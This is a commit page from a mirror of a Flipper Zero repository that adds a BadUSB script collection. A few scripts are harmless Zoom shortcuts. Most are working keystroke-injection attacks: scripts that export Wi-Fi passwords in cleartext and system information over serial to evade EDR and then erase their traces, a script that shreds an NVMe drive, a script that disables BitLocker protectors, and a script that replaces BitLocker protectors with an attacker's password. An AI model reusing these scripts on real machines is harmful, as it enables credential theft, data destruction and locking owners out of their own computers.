mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-21 14:00:13 +00:00
Added emptythevoid's BadUSB collection
This commit is contained in:
parent
70856507e4
commit
24f5187975
6
BadUSB/emptythevoid-BadUSB/Linux_helpers/README.md
Normal file
6
BadUSB/emptythevoid-BadUSB/Linux_helpers/README.md
Normal file
@ -0,0 +1,6 @@
|
||||
A collection of BadUSB scripts to assist on Linux
|
||||
|
||||
poweroff_linux.txt opens a terminal and runs the 'poweroff' command.
|
||||
|
||||
shred_nvme_live_ubuntu_mate.txt is intended to be used in conjuncton with an Ubuntu Mate LiveUSB to boot a system
|
||||
and then run sudo shred -vn1 on /dev/nvme0n1 Since it's a LiveUSB, sudo will not ask for a password. Refer to the script for further instructions.
|
@ -0,0 +1,8 @@
|
||||
REM Power off Linux from terminal
|
||||
|
||||
DELAY 500
|
||||
CTRL-ALT T
|
||||
DELAY 1000
|
||||
STRING poweroff
|
||||
ENTER
|
||||
|
@ -0,0 +1,18 @@
|
||||
REM Using an Ubuntu Mate Desktop bootable flash drive booted as a Live USB
|
||||
REM this script will run the shred command on the first nvme drive the system is aware of (change as needed)
|
||||
|
||||
REM Run this once you're at the Install prompt
|
||||
|
||||
REM Press Try Ubuntu Mate and then wait for manual button press on Flipper
|
||||
DELAY 500
|
||||
TAB
|
||||
DELAY 100
|
||||
ENTER
|
||||
WAIT_FOR_BUTTON_PRESS
|
||||
|
||||
REM Run this only after the desktop has fully booted
|
||||
DELAY 500
|
||||
CTRL-ALT T
|
||||
DELAY 1000
|
||||
STRING sudo shred -vn1 /dev/nvme0n1
|
||||
ENTER
|
1
BadUSB/emptythevoid-BadUSB/ReadMe.md
Normal file
1
BadUSB/emptythevoid-BadUSB/ReadMe.md
Normal file
@ -0,0 +1 @@
|
||||
This collection is from emptythevoid! [Updates may be available here](https://github.com/emptythevoid/flipperzero/tree/main/badusb).
|
@ -0,0 +1,4 @@
|
||||
REM Demo Zoom Mute toggle for MacOS
|
||||
REM Recommend setting Enable Global Shortcut so that this button works even when Zoom is minimized
|
||||
|
||||
GUI-SHIFT A
|
@ -0,0 +1,4 @@
|
||||
REM Demo Zoom Mute toggle for MacOS
|
||||
REM Recommend setting Enable Global Shortcut so that this button works even when Zoom is minimized
|
||||
|
||||
GUI-SHIFT V
|
@ -0,0 +1,4 @@
|
||||
REM Keyboard shortcut to toggle Microphone Mute
|
||||
REM Recommend setting Enable Global Shortcut so that this button works even when Zoom is minimized
|
||||
|
||||
ALT A
|
@ -0,0 +1,4 @@
|
||||
REM Keyboard shortcut to toggle the Video Camera
|
||||
REM Recommend setting Enable Global Shortcut so that this button works even when Zoom is minimized
|
||||
|
||||
ALT V
|
@ -0,0 +1,45 @@
|
||||
// Title: Read Data from Flipper via Serial (adapted to JS)
|
||||
// Author: emptythevoid
|
||||
// Target: Windows 10, Windows 11
|
||||
// Version: 1.0
|
||||
// Category: PoC
|
||||
// Desc: This script will read in a small payload from the Flipper's SD card
|
||||
// over serial, possibly bypassing EDR. In this proof-of-concept, the "payload"
|
||||
// is saved to the current user's Desktop
|
||||
|
||||
let badusb = require("badusb");
|
||||
let notify = require("notification");
|
||||
let flipper = require("flipper");
|
||||
let dialog = require("dialog");
|
||||
|
||||
badusb.setup({ vid: 0x1234, pid: 0x1234, mfr_name: "Flipper", prod_name: "Zero" });
|
||||
dialog.message("Read from Flipper Serial", "Press OK to start");
|
||||
|
||||
if (badusb.isConnected()) {
|
||||
notify.blink("green", "short");
|
||||
|
||||
badusb.press("GUI", "r");
|
||||
delay(500);
|
||||
|
||||
badusb.println("powershell");
|
||||
delay(750);
|
||||
|
||||
|
||||
badusb.println('$SUSB="USB\\\VID_0483&PID_5740";'); // the device ID of the Flipper.
|
||||
|
||||
// Commands to build the serial port
|
||||
badusb.println('1..600|%{Try{$port = New-Object System.IO.Ports.SerialPort;$COM=("COM$(Get-PNPDevice -PresentOnly | Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"} | % name | select-string \d+ | % { $_.matches.value })");$port.PortName = $COM;$port.BaudRate = "230400";$port.Parity = "None";$port.DataBits = 8;$port.StopBits = 1;$port.ReadTimeout = 9000;$port.DTREnable = $True;$port.open();$SPATH="/ext/apps_data/testfile.txt";$OPATH="C:\\users\\$env:username\\Desktop\\outfile.txt";Start-Sleep -m 500;$port.DiscardInBuffer();$port.Write("storage read $SPATH `r`n");Start-Sleep -m 500;$outfile = $port.ReadExisting();$outfileformat = $outfile.split([string[]]"`r`n", [StringSplitOptions]::None);$outfileformat[2..($outfileformat.length -3)] | Out-File $OPATH;$port.close();echo "done";exit;}Catch{Sleep 1}};');
|
||||
|
||||
// Command to have powershell wait for Flipper to exit badUSB mode, identify which COM port it's connected to, and open a serial connection and write contents of $d.
|
||||
// It will remove the temp information created earlier
|
||||
//badusb.println('1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(Get-PNPDevice -PresentOnly | Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"} | % name | select-string \d+ | % { $_.matches.value })",230400,"None",8,"one");$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();cd..;Remove-Item $env:temp/js2k3kd4nne5dhsk -Recurse;exit}Catch{Sleep 1}}');
|
||||
|
||||
badusb.quit(); //automatically quit badusb and await serial connection
|
||||
|
||||
|
||||
|
||||
notify.success();
|
||||
} else {
|
||||
print("USB not connected");
|
||||
notify.error();
|
||||
}
|
@ -0,0 +1,40 @@
|
||||
// Title: Save To Flipper via Serial (adapted to JS)
|
||||
// Author: emptythevoid and LupusE
|
||||
// Credit to Gas Station Hot Dog for improvements in filename generation
|
||||
// Target: Windows 10, Windows 11
|
||||
// Version: 1.2
|
||||
// Category: Data Exfiltration
|
||||
// Desc: This script runs the Get-ComputerInfo command and saves it to
|
||||
// the Flipper by it's serial interface, which may bypass EDR
|
||||
// By default, data is stored on the Flipper in the apps_data folder
|
||||
|
||||
let badusb = require("badusb");
|
||||
let notify = require("notification");
|
||||
let flipper = require("flipper");
|
||||
let dialog = require("dialog");
|
||||
|
||||
badusb.setup({ vid: 0x1234, pid: 0x1234, mfr_name: "Flipper", prod_name: "Zero" });
|
||||
dialog.message("Save to Flipper Serial", "Press OK to start");
|
||||
|
||||
if (badusb.isConnected()) {
|
||||
notify.blink("green", "short");
|
||||
|
||||
badusb.press("GUI", "r");
|
||||
delay(500);
|
||||
|
||||
badusb.println("powershell");
|
||||
delay(750);
|
||||
badusb.println("$d=(Get-ComputerInfo|Out-String);");
|
||||
badusb.println('$SUSB="USB\\\VID_0483&PID_5740";');
|
||||
badusb.println('$SPATH="/ext/apps_data/exfil_data${env:computername}.txt";');
|
||||
badusb.println('1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(Get-PNPDevice -PresentOnly | Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"} | % name | select-string \d+ | % { $_.matches.value })",230400,"None",8,"one");$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();exit}Catch{Sleep 1}}');
|
||||
|
||||
badusb.quit();
|
||||
|
||||
|
||||
|
||||
notify.success();
|
||||
} else {
|
||||
print("USB not connected");
|
||||
notify.error();
|
||||
}
|
@ -0,0 +1,45 @@
|
||||
// Title: Save Wifi To Flipper via Serial (adapted to JS)
|
||||
// Author: emptythevoid and LupusE
|
||||
// Credit to Gas Station Hot Dog for improvements in filename generation
|
||||
// Target: Windows 10, Windows 11
|
||||
// Version: 1.2
|
||||
// Category: Data Exfiltration
|
||||
// Desc: This script exfiltrates wifi profiles using export command by theb0ne
|
||||
// the Flipper by it's serial interface, which may bypass EDR
|
||||
// By default, data is stored on the Flipper in the apps_data folder
|
||||
|
||||
let badusb = require("badusb");
|
||||
let notify = require("notification");
|
||||
let flipper = require("flipper");
|
||||
let dialog = require("dialog");
|
||||
|
||||
badusb.setup({ vid: 0x1234, pid: 0x1234, mfr_name: "Flipper", prod_name: "Zero" });
|
||||
dialog.message("Save to Flipper Serial", "Press OK to start");
|
||||
|
||||
if (badusb.isConnected()) {
|
||||
notify.blink("green", "short");
|
||||
|
||||
badusb.press("GUI", "r");
|
||||
delay(500);
|
||||
|
||||
badusb.println("powershell");
|
||||
delay(750);
|
||||
//badusb.println("$d=(Get-ComputerInfo|Out-String);");
|
||||
badusb.println('New-Item -Path $env:temp -Name "js2k3kd4nne5dhsk" -ItemType "directory"; Set-Location -Path "$env:temp/js2k3kd4nne5dhsk"; netsh wlan export profile key=clear;') // Exports key material to temp directory in user's profile
|
||||
badusb.println('$d=Select-String -Path *.xml -Pattern "keyMaterial"|Out-String;') // Command to extract just the key material and save to $d
|
||||
badusb.println('$SUSB="USB\\\VID_0483&PID_5740";'); // the device ID of the Flipper.
|
||||
badusb.println('$SPATH="/ext/apps_data/exfil_data${env:computername}.txt";'); // path on the Flipper SD card to store data
|
||||
|
||||
// Command to have powershell wait for Flipper to exit badUSB mode, identify which COM port it's connected to, and open a serial connection and write contents of $d.
|
||||
// It will remove the temp information created earlier
|
||||
badusb.println('1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(Get-PNPDevice -PresentOnly | Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"} | % name | select-string \d+ | % { $_.matches.value })",230400,"None",8,"one");$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();cd..;Remove-Item $env:temp/js2k3kd4nne5dhsk -Recurse;exit}Catch{Sleep 1}}');
|
||||
|
||||
badusb.quit();
|
||||
|
||||
|
||||
|
||||
notify.success();
|
||||
} else {
|
||||
print("USB not connected");
|
||||
notify.error();
|
||||
}
|
@ -0,0 +1,40 @@
|
||||
// Title: Save To Flipper via Serial (adapted to JS)
|
||||
// Author: emptythevoid and LupusE
|
||||
// Credit to Gas Station Hot Dog for improvements in filename generation
|
||||
// Target: Windows 10, Windows 11
|
||||
// Version: 1.2
|
||||
// Category: Data Exfiltration
|
||||
// Desc: This script runs the Get-ComputerInfo command and saves it to
|
||||
// the Flipper by it's serial interface, which may bypass EDR
|
||||
// By default, data is stored on the Flipper in the apps_data folder
|
||||
|
||||
let badusb = require("badusb");
|
||||
let notify = require("notification");
|
||||
let flipper = require("flipper");
|
||||
let dialog = require("dialog");
|
||||
|
||||
badusb.setup({ vid: 0x1234, pid: 0x1234, mfr_name: "Flipper", prod_name: "Zero" });
|
||||
dialog.message("Save to Flipper Serial", "Press OK to start");
|
||||
|
||||
if (badusb.isConnected()) {
|
||||
notify.blink("green", "short");
|
||||
|
||||
badusb.press("GUI", "r");
|
||||
delay(500);
|
||||
|
||||
badusb.println("powershell");
|
||||
delay(750);
|
||||
badusb.println("$d=(Get-ComputerInfo|Out-String);");
|
||||
badusb.println('$SUSB="USB\\\VID_0483&PID_5740";');
|
||||
badusb.println('$SPATH="/ext/apps_data/exfil_data${env:computername}.txt";');
|
||||
badusb.println('1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(Get-PNPDevice -PresentOnly | Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"} | % name | select-string \d+ | % { $_.matches.value })",230400,"None",8,"one");$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();exit}Catch{Sleep 1}}');
|
||||
|
||||
badusb.quit();
|
||||
|
||||
|
||||
|
||||
notify.success();
|
||||
} else {
|
||||
print("USB not connected");
|
||||
notify.error();
|
||||
}
|
45
BadUSB/emptythevoid-BadUSB/badusb-js/save_wifi_serial.js
Normal file
45
BadUSB/emptythevoid-BadUSB/badusb-js/save_wifi_serial.js
Normal file
@ -0,0 +1,45 @@
|
||||
// Title: Save Wifi To Flipper via Serial (adapted to JS)
|
||||
// Author: emptythevoid and LupusE
|
||||
// Credit to Gas Station Hot Dog for improvements in filename generation
|
||||
// Target: Windows 10, Windows 11
|
||||
// Version: 1.2
|
||||
// Category: Data Exfiltration
|
||||
// Desc: This script exfiltrates wifi profiles using export command by theb0ne
|
||||
// the Flipper by it's serial interface, which may bypass EDR
|
||||
// By default, data is stored on the Flipper in the apps_data folder
|
||||
|
||||
let badusb = require("badusb");
|
||||
let notify = require("notification");
|
||||
let flipper = require("flipper");
|
||||
let dialog = require("dialog");
|
||||
|
||||
badusb.setup({ vid: 0x1234, pid: 0x1234, mfr_name: "Flipper", prod_name: "Zero" });
|
||||
dialog.message("Save to Flipper Serial", "Press OK to start");
|
||||
|
||||
if (badusb.isConnected()) {
|
||||
notify.blink("green", "short");
|
||||
|
||||
badusb.press("GUI", "r");
|
||||
delay(500);
|
||||
|
||||
badusb.println("powershell");
|
||||
delay(750);
|
||||
//badusb.println("$d=(Get-ComputerInfo|Out-String);");
|
||||
badusb.println('New-Item -Path $env:temp -Name "js2k3kd4nne5dhsk" -ItemType "directory"; Set-Location -Path "$env:temp/js2k3kd4nne5dhsk"; netsh wlan export profile key=clear;') // Exports key material to temp directory in user's profile
|
||||
badusb.println('$d=Select-String -Path *.xml -Pattern "keyMaterial"|Out-String;') // Command to extract just the key material and save to $d
|
||||
badusb.println('$SUSB="USB\\\VID_0483&PID_5740";'); // the device ID of the Flipper.
|
||||
badusb.println('$SPATH="/ext/apps_data/exfil_data${env:computername}.txt";'); // path on the Flipper SD card to store data
|
||||
|
||||
// Command to have powershell wait for Flipper to exit badUSB mode, identify which COM port it's connected to, and open a serial connection and write contents of $d.
|
||||
// It will remove the temp information created earlier
|
||||
badusb.println('1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(Get-PNPDevice -PresentOnly | Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"} | % name | select-string \d+ | % { $_.matches.value })",230400,"None",8,"one");$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();cd..;Remove-Item $env:temp/js2k3kd4nne5dhsk -Recurse;exit}Catch{Sleep 1}}');
|
||||
|
||||
badusb.quit();
|
||||
|
||||
|
||||
|
||||
notify.success();
|
||||
} else {
|
||||
print("USB not connected");
|
||||
notify.error();
|
||||
}
|
@ -0,0 +1,101 @@
|
||||
REM Base64 has to be broken up into chunks, otherwise Flipper crashes
|
||||
|
||||
REM Encode file to base64. On Linux:
|
||||
REM cat file.txt | base64 -w 0 > encoded.txt
|
||||
REM and then to prepend STRING to each line
|
||||
REM awk '{print "prefix" $0}' encoded.txt > encoded_string.txt
|
||||
REM then copy and paste, then remove the first STRING and replace with $b64="
|
||||
|
||||
REM May need to uncomment and adjust per-line delay. Otherwise it may stumble over itself
|
||||
REM particularly if the base64 is very large
|
||||
REM DEFAULTDELAY 100
|
||||
|
||||
REM slow down flipper string entry so keyboard buffer doesn't get broken
|
||||
REM not sure if needed or not
|
||||
STRING_DELAY 100
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 750
|
||||
|
||||
REM Base64 goes here. Make sure to start with $b64=" and end with ";
|
||||
STRING $b64="/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBwgHBgkIBwgKCgkLDRYPDQwMDRsUFRAWIB0iIiAd
|
||||
STRING Hx8kKDQsJCYxJx8fLT0tMTU3Ojo6Iys/RD84QzQ5OjcBCgoKDQwNGg8PGjclHyU3Nzc3Nzc3Nzc3
|
||||
STRING Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3N//AABEIAJQApgMBEQACEQED
|
||||
STRING EQH/xAAbAAEAAgMBAQAAAAAAAAAAAAAABAUBAgMGB//EADwQAAEDAgQEAwUFBgcBAAAAAAEAAgME
|
||||
STRING EQUSITFBUWFxEyKBBhQyQpEjUqGx4TNDcsHR8CQ0U2KCkvEV/8QAGgEBAAIDAQAAAAAAAAAAAAAA
|
||||
STRING AAEEAgMFBv/EAC8RAQABAwIDBQcFAQAAAAAAAAABAgMRBCESMWETQVFx8AUiIzKBkaFCscHh8RT/
|
||||
STRING 2gAMAwEAAhEDEQA/APuKAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC
|
||||
STRING AgICDUuaOKDUyDgoyNDKRyUA2pjJsXDuNlOR2DgQCNQVIygICAgICAgICAgICAg1c4N3NkHMzfdF
|
||||
STRING 1GRo6Qnc2QcnTAdVCXMzE7eXugq8dximwXDZa+uk+zYLAA+Z7uDWjiSkj5u92K4rP79ieMVdHVy+
|
||||
STRING eCmppS1tO35QRxPfdc67rqoq+HTmI73Utez6Zo+JViZ7lvh3tfj+BBrcYg/+nSDeqpWgSAc3M2PW
|
||||
STRING 1lvtay3c25T1V72hu2t+cdHusA9q8Kx2HPQ1ccjgPNHez2d27hW8qeF41wcLtII6KUMoCAgICAgI
|
||||
STRING CAgIBQVtc8+ORyCgcBI4bFQluXFwuSgwg5VM8VNBJPUSCOKJpe97tmgcUkfM6mul9p8Tbi1RHIMN
|
||||
STRING pyRQUzhq88ZXDnyvsFztZqMfDonzdTQaXPxa4z4ebFbSGR7pckzS45nEEOtw2vy5H+d6VFfDHDn1
|
||||
STRING 68XRromZ4o9eujEVZU0w+3+1j/1G8O/6/VTNqmv5eaIu1UfNy8fXrq1mw/D8RmbUwl9NWs1ZNA7I
|
||||
STRING 8H03U2796ztnMMLmmsX98YlZ0HtP7R4D5a+M4vRtOksFmzNHUbO/vVdCzrbdzadpcy9oLtveN4/L
|
||||
STRING 2/s97X4TjrB7lUtMgF3ROGV7e7TqruVHD0DHteMzXAg8lKGyAgICAgICAgIKyu/zDvRYiOiW42CA
|
||||
STRING UHz72vrJsexmXBG5o8MoXNNW7YzyEBzWfwgEFVNVqOxp935p5Luj0vbVZq+WHGqMjI446Zlm3yks
|
||||
STRING HwDouPbimZzU7tyaoiIpU9IcYjqz73F4bHNGVzHZhe/fUW4nkFarixNHubypW51EXMXIxCdKBHd8
|
||||
STRING b5PEbeztT9dLHn6rVHvc8LExjeObpJR09QM0LvBkBzDLt/1/sqO0rpnfeE9lRVy2ljJVUxLoXeKw
|
||||
STRING bsbw9Dv6H0UzNuvnsj4lHKco1TTYbibo5J2+71Q1jnjdkffoVnRXes7U7x4NVy1YvfPtPjCyocf9
|
||||
STRING psBcPFtjFFvmHlqGjvs71V+1rrde1W0ude9n3KN6d4/L2/s17aYX7QNc2llImjH2sEjckjO7TuOo
|
||||
STRING V2JUJh6RkjXi7CCOilDZAQEBAQEGDsgrqwf4k9gVA45VCWL2QLoIVdhVLWPMr2lkpFvEZoTyvzWi
|
||||
STRING 9Youx7yxY1NyzOaVBXYPUUt3NHiRD52DbuFy72iro3p3h17HtC3c2q2lT1Mc2UupZY2Pv+8bmafx
|
||||
STRING BH1VemYziqJ9fdarirGaJj67x/CrxJ+KROY4VBjp7We6KmzOaedrm4/HorVqLE7Y36yq3pvxOeLb
|
||||
STRING pDvSU/gRiqlxKoqhu3xXNa0Hta4358VruVcU8MURHl/rZbo4Y4prmrz/AMSqOSGQl7Ha8WEC439D
|
||||
STRING x26rXcpqiN4bbdUTO0uVdhcVTmcwmJ7hY20B+mx6/msrd+aNp5MLunivMxzRqGGuoneG58jrkZNi
|
||||
STRING 23G5H6LZcqt3Pea7dNy3PDz8P9ek9n8JZVY3FjBjye6texkjRbxXOBa7uB+fZW9BRVFEzM7Soe0q
|
||||
STRING 6JriIjd67xmxG/ihpHG+qv5w5sUzKTBikZsHvYeoKmKolPDMJ8crJRdjgVkxdEBAQEBBVYqTHVxP
|
||||
STRING Gxbb6f8AqiRyEgcOShLKDCDFzdBsHcja6CBX4RS1gOaPw5CPjaLX7jitFzT27nON1i1qrlraJzDz
|
||||
STRING lZgElEzyMPhN+anLm27tBXPu6W7TOad4dSxrLNcYmOGUNrA1gDBZu3NUZme90IxjZyfTtMhlYcsv
|
||||
STRING BxJcB07bbWWcV7YnkwmiM5jm5g1UTznPixi1zlGY3vew5DRTiiroj36eqfT0stdUCkp3FhcLyyN/
|
||||
STRING ds4nueH6LPTWJu178mvVajsaOq3rsSjooxR0DWtZG3K3Ls0K9qdVFmOCjm52l0c3546+Sklnml1k
|
||||
STRING lcel9PouTXduV/NLsUWrdHyw5h7mkZXkHvZYxVVE5iWU0xVGJhZ4bjFRSSAPeS2+vRXdPrq6ZxXv
|
||||
STRING ChqNBRXGaNpeyosTE0QebOaRuNwu1TVFUZhwqqZpnErGN7Xjym6zYt0BAQV+LxF0ccg+Q6+qiRAG
|
||||
STRING v6KEtwSOyDYG6CLV+8yO8GnPhNIu6c626Ac+q03Yu1e7RtHj/Tda7KmOOvfohw09XTBwa8BrBc53
|
||||
STRING 5o3ddfM0/ULRRbu2+U8vHl+d4/MLFdyzdxmOfhGJ/G0/iU6lqRPHnaHZb2BI0d1HMKzbuRcjMevL
|
||||
STRING oq3bc26uGfXn1d7g67FZtSFWYXS1V3FvhyH52CxPfmtN3TW7vON1qzq7tnlOyhrcKqaW7reLEPnj
|
||||
STRING F7dwuXe0ddveN4dezrrdzadpQNRYRsMkjjZjGjVxVemia6uGFqu5TRTxTyelo6MYVhcxfZ8xaXzP
|
||||
STRING HzOtw6C2i7tq1FqjEPO3bs3rmZeWZmewOebucLuPM8V52uZqqmqXpaYimmKYaSyZZmRA2LgXE24C
|
||||
STRING 231TluygnkayN0lnZWi7gTe44pE5nCN4blttFile+y87s00B2AuF2vZ1czbxPc4ftOiIriqO966j
|
||||
STRING d9kNdQbXXQcxNBuLrJDKAgwQHCxFwghT0DTrCcp+6dlGBCfG+N2WRpB/NQARLKDjV0sdXCYpb5b3
|
||||
STRING 0NtVru2qbtPDU2WrtVqripRz73BG65ZUHaMgZD/y4fT6LD4tFM/q9d/r6M/g3Kox7vj3/ZBFZVRg
|
||||
STRING vuchcS6aVhDL/dFtWjqVV7a7Rv3eMxOPLpHWYW+ws1bd/dETGfPrPSEyjxOKoLhfK9mjrkEE9HDQ
|
||||
STRING qza1NFzMd8eufJWu6Wu3ifH1yndOuDoFYVWrYo2vziNodzA1UcMMpqqmMTKNTU1Q2nmirao1OeRx
|
||||
STRING YTGG5WHZum9ue6TBnE5eSZC6mkdSy/tIdLcS3gfp/Neev2ZtVzEvS2b0XaIqhiopWTZbuLHt+Fw3
|
||||
STRING HNa8NsVYcvcXEtM8xe1puGBoaD3UYZcbo9pGw07/AKLGSJXXszARH70bhsrrM6tAtf6rtaG3NFrM
|
||||
STRING 97h+0bsV3OGO793qaI6OCvw5ywjN2BZIboCAgIMPaHtyuFweCCFLQjeEgf7SowIrmujdleCCoSAI
|
||||
STRING MFt90GjmFBWVGGmdxc+UeU/ZxlgLGjkW8e6qXNLNc71eW20fRct6uLfKnznO8/VD8ebDnlr3sLbW
|
||||
STRING EIcXBnUuPwjotHHXp5xM7eG+I657ob+zo1EZiJz47ZnpiOcrGDEGOe2OUGKVw8rXkebsdirlF+Jn
|
||||
STRING FW0+uUqdzT1UxmneP2845pgcDx1W5oQsTwyGua1ziY5m/BKz4m/1HRartmm7GKm6xqKrM5pUcuH4
|
||||
STRING lTOIMEVQOD43BpPcH+q5leiuR8u/4dWjXWquezn4GISeVmHSBx4vkYAPxWH/AB3p7mydXYj9X4kN
|
||||
STRING CyBwfi8rXDf3aDUH+Im1x9PVZ9jb0+Krs5nwhh/0XL+abMY6yvaXEaeqaBFdjmlpDXC2nRXrOqt3
|
||||
STRING dqXOvaS5a3q3XFIbSEdFaVFjAfKVMIdVIICAgICDV7GvbZwuEEOWjN80R9CoEcgtNnjKeqhJZBq+
|
||||
STRING MO33QQqmgY95lbmZLb9ow2PrzHQrVXYpqnMbT4x63+rdRfrpjhnePCfW30Qn0dQyLwKZ8MQNy+UM
|
||||
STRING sS7oOHdaZs3IjgoxHjP9fy3RftzVx1xM+EZ/nv8AJGhNZDOaeCMvLLF7ZZLtAPFrjr6arTbm9RVw
|
||||
STRING U7455nb78/3bq6bFdHaVTjPKYjf7clw15G49F0Yc3budA8EWumALbajTsokebx2CeKrNR4cj4JGA
|
||||
STRING F0bblhHTkVzdbYrqqiqmMutodRRTTwTOJRsOilq6mL3eKRsQN3yvYWADoDqStWmsV8cVYxEN2rv2
|
||||
STRING 4tzGd5exjflkuuw4ayo3Zmk8FMISVIICAgICAgINJI2PFnAIIstK5usZuOSjA4G4NiCCoSwUHHyS
|
||||
STRING 3blcx++otcJgRn0hZU+OCb5Cw24i9/w1WHBHFxdMM+0ng4OuWFkwLaKRkPI6oOjXtdxsUGSgyzzG
|
||||
STRING wB15ILTDyww3iIc29rjmphCUpBAQEBAQEBAQEGj42yCz2jugiSUz2ax+YclGBwLG6gtym1lCVS+l
|
||||
STRING xGge59DP7xETc09Q4nf7r9S38R2QZp8RpKqQQSNdS1R2hmAaXfwnZ3ogkSROZuNOaDkUGEBpvINS
|
||||
STRING g7Pc6zYoyWvk+YfK3iUF3RQtp6ZkbG5WtGg5LJDugICAgICAgICAgICDnLCyQeYa80EV9PIwXYcw
|
||||
STRING UCBWUNNXRmOpia9vJwUJbUdN7rTiHxHPDfhzuLjblc7oElO12rdCgiyROYfMPog5xkeKOiCzw+Fs
|
||||
STRING spkLTYbnn0UoWykEBAQEBAQEBAQEBAQEBBykgZJuLHmEEWSnfHqPMOixHHfTikpV7MWoKiV1PHUt
|
||||
STRING bNcgRv8AKXHpff0WPFGcMuzqxnGyPTB8lcI4mEknU/dCnO7HGz1MEQhiDBw3PNZodEBAQEBAQEBA
|
||||
STRING QEBAQEBAQEBBxlp2SakWdzCCtnwsGYSiGN0jdnDRYcLLinGEjDKA0xdJJ8btAOQWUQxWCkEBAQEB
|
||||
STRING AQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBB//Z";
|
||||
|
||||
STRING $desktop = [Environment]::GetFolderPath("Desktop");
|
||||
STRING $filename = $desktop+"\file.jpg";
|
||||
|
||||
STRING $bytes = [Convert]::FromBase64String($b64);
|
||||
STRING [IO.File]::WriteAllBytes($filename, $bytes);
|
||||
STRING Invoke-Item $filename;
|
||||
|
||||
ENTER
|
13
BadUSB/emptythevoid-BadUSB/bitlocker/bitlocker_disable.txt
Normal file
13
BadUSB/emptythevoid-BadUSB/bitlocker/bitlocker_disable.txt
Normal file
@ -0,0 +1,13 @@
|
||||
REM launch command prompt as admin as fast as possible
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell Start-Process cmd -Verb runAs
|
||||
ENTER
|
||||
DELAY 3000
|
||||
ALT y
|
||||
DELAY 500
|
||||
|
||||
STRING manage-bde -protectors -Disable C: -RebootCount 0
|
||||
ENTER
|
||||
DELAY 500
|
||||
ALT F4
|
@ -0,0 +1,161 @@
|
||||
REM Enable Bitlocker encryption with a user-supplied password
|
||||
REM and optionally reboot the computer immediately
|
||||
|
||||
REM Author: emptythevoid
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
REM MORE RESEARCH REQUIRED
|
||||
|
||||
REM ==INFO========================================================================================
|
||||
REM If the drive is already encrypted with a protector (lke TPM)
|
||||
REM it will delete all protectors and substitute our own new password
|
||||
REM without needing to re-encrypt.
|
||||
REM If the drive doesn't have bitlocker enabled, it will do so with the new password
|
||||
REM and take effect on next reboot (which you can optionally enable at the end)
|
||||
|
||||
REM Note #1: This will likely fail if the drive is currently in the process of encryption.
|
||||
|
||||
REM Note #2 If the target computer is a tablet (aka "slab"), Windows will disallow
|
||||
REM preboot authentication options that might require a keyboard. To override this,
|
||||
REM you have to set a local group policy. This might be possible to do by editing the
|
||||
REM registry directly, but since Windows specifically complains about Group Policy,
|
||||
REM I've encoded a Registry.pol below that you can optionally deploy.
|
||||
REM It will create a file in C:\Windows\System32\GroupPolicy\Machine
|
||||
REM which should take effect immediately.
|
||||
REM This Registry.pol enables these two policy values:
|
||||
REM Computer Configuration\Administrative Templates\Windows Components\Bitlocker Drive Encryption\Operating System Drives\ Enable use of Bitlocker authentication requiring preboot keyboard input on slates
|
||||
REM Computer Configuration > Administrative Templates > Windows Components > Bitlocker Drive Encryption > Operating System Drives > Open the key Require additional authentication at startup
|
||||
REM ==Launch command prompt as Admin using GUI + X ===============================================
|
||||
REM ==NOTE that this brings up a Powershell window, not cmd.exe===================================
|
||||
REM ==This method may be more reliable since GUI r can sometimes lose focus on open===============
|
||||
GUI x
|
||||
DELAY 200
|
||||
STRING A
|
||||
DELAY 1000
|
||||
ALT y
|
||||
DELAY 3000
|
||||
|
||||
|
||||
REM ==Optional - local group policy to allow password protection on tablets========================
|
||||
REM ==Simply copying the registry.pol file is not sufficient.
|
||||
|
||||
|
||||
REM STRING $folderpath = [Environment]::GetFolderPath("C:\Windows\System32\GroupPolicy\Machine");
|
||||
REM STRING $filename = $folderpath+"\Registry.pol";
|
||||
|
||||
STRING mkdir C:\windows\system32\grouppolicy\machine
|
||||
DELAY 100
|
||||
ENTER
|
||||
DELAY 100
|
||||
|
||||
STRING $filename = "C:\Windows\System32\GroupPolicy\Machine\Registry.pol";
|
||||
|
||||
STRING $b64="UFJlZwEAAABbAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwA
|
||||
STRING RgBWAEUAAAA7AE8AUwBFAG4AYQBiAGwAZQBQAHIAZQBiAG8AbwB0AEkAbgBwAHUAdABQAHIAbwB0AGUAYwB0AG8AcgBzAE8AbgB
|
||||
STRING TAGwAYQB0AGUAcwAAADsABAAAADsABAAAADsAAQAAAF0AWwBTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAY
|
||||
